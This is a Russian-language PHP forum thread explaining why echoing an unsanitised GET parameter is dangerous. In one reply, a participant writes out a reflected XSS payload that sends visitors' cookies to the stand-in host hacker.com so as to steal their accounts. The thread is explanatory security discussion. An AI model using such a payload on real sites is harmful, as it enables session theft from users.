powered by simpleCommunicator - 2.0.60     © 2026 Programmizd 02
Целевая тема:
Создать новую тему:
Автор:
Закрыть
Цитировать
Форумы / PHP, Perl, Python [игнор отключен] [закрыт для гостей] / Вопрос по GET
8 сообщений из 8, страница 1 из 1
Вопрос по GET
    #38399464
sharmanka
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Гость
Всем привет.
Только разбираюсь с PHP, прошу помощи. Допустим есть такой скриптик:

Код: php
1.
<?php echo $_GET['key']; ?>



Прочитал, что так писать крайне небезопасно. Возникло два вопроса:
1. Почему?
2. Разве возможно как-то таким образом выполнить код или залить шелл? Ведь выполнив в браузере script.php?key=<?php phpinfo(); ?> Мы получим дулю с маком, а не вывод кода.
...
Рейтинг: 0 / 0
Вопрос по GET
    #38399502
vkle
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
sharmankaПрочитал, что так писать крайне небезопасноКак именно "так"?
Тупо вывести клиенту без проверки входные данные - да пусть забирает, тем более, что они от него и пришли. Серверу это не повредит.
Однако, здесь есть возможность некоторым образом исказить веб-страничку. Допустим, это echo выводит текст поискового запроса в фразе "Вы искали 'нечто', найдено хх результатов." Всего лишь, надо правильным образом написать передаваемое значение key и тогда вполне можно получить на страничке сайта совершенно левую ссылку. Ясен пень, если на каком то стороннем сайте будет размещена таким вот "правильным" образом сформированная ссылка на Ваш сайт, то поисковики не преминут проиндексировать и эту самую левую ссылку с Вашего сайта.
sharmankaВедь выполнив в браузере script.php?key=<?php phpinfo(); ?> Мы получим дулю с маком, а не вывод кода.Таки посмотрите исходный код этой дули :-)
...
Рейтинг: 0 / 0
Вопрос по GET
    #38399505
sharmanka
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Гость
vkleЯсен пень, если на каком то стороннем сайте будет размещена таким вот "правильным" образом сформированная ссылка на Ваш сайт, то поисковики не преминут проиндексировать и эту самую левую ссылку с Вашего сайта
звучит как-то совсем не страшно :)

vkleТаки посмотрите исходный код этой дули :-)
посмотрел. Вижу текст, вывод пхпинфо не вижу. Или не так смотрю?
...
Рейтинг: 0 / 0
Вопрос по GET
    #38399508
vkle
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
sharmankavkleЯсен пень, если на каком то стороннем сайте будет размещена таким вот "правильным" образом сформированная ссылка на Ваш сайт, то поисковики не преминут проиндексировать и эту самую левую ссылку с Вашего сайта
звучит как-то совсем не страшно :)Формально, ничего страшного и нет. Но когда окажется что на сайте будут неконтролируемые сторонние ссылки, а это довольно быстро заметят SEO-шники, вот тогда и придется переделывать. Впрочем, вместо ссылки можно сформировать яваскрипт или любой другой сторонний контент.


sharmankaВижу текст, вывод пхпинфо не вижу.А с чего вдруг этот текст должен выполниться на вебсервере? Не должен. Но есть текст, а не шиш с маслом - это две большие разницы.
...
Рейтинг: 0 / 0
Вопрос по GET
    #38399509
sharmanka
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Гость
vkle, т.е я правильно понял - кроме гипотетического интереса со стороны сеошников опасаться нечего?
...
Рейтинг: 0 / 0
Вопрос по GET
    #38399512
vkle
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
sharmanka,

Нет, совершенно не так поняли. Сайт вполне может быть забанен поисковиками по разным причинам (включая и участие в распространении вредоносного ПО).
...
Рейтинг: 0 / 0
Вопрос по GET
    #38400146
Фотография Ренат
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
vkleТупо вывести клиенту без проверки входные данные - да пусть забирает, тем более, что они от него и пришли. Серверу это не повредит.
ага и как пользователи начнут переходить по ссылке:
Код: html
1.
?key=<script>$.post('http://hacker.com/cookie', {cookie: document.cookie})</script>


начнут удивляться, и как угнали их аккаунты?
...
Рейтинг: 0 / 0
Вопрос по GET
    #38400609
vkle
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Участник
Ренат,

Ну да, повредит то пользователям, репутации сайта, еще чему... Но не серверу.
...
Рейтинг: 0 / 0
8 сообщений из 8, страница 1 из 1
Форумы / PHP, Perl, Python [игнор отключен] [закрыт для гостей] / Вопрос по GET
Найденые пользователи ...
Разблокировать пользователей ...
Читали форум (0):
Пользователи онлайн (0):
x
x
Закрыть


Просмотр
0 / 0
Close
Debug Console [Select Text]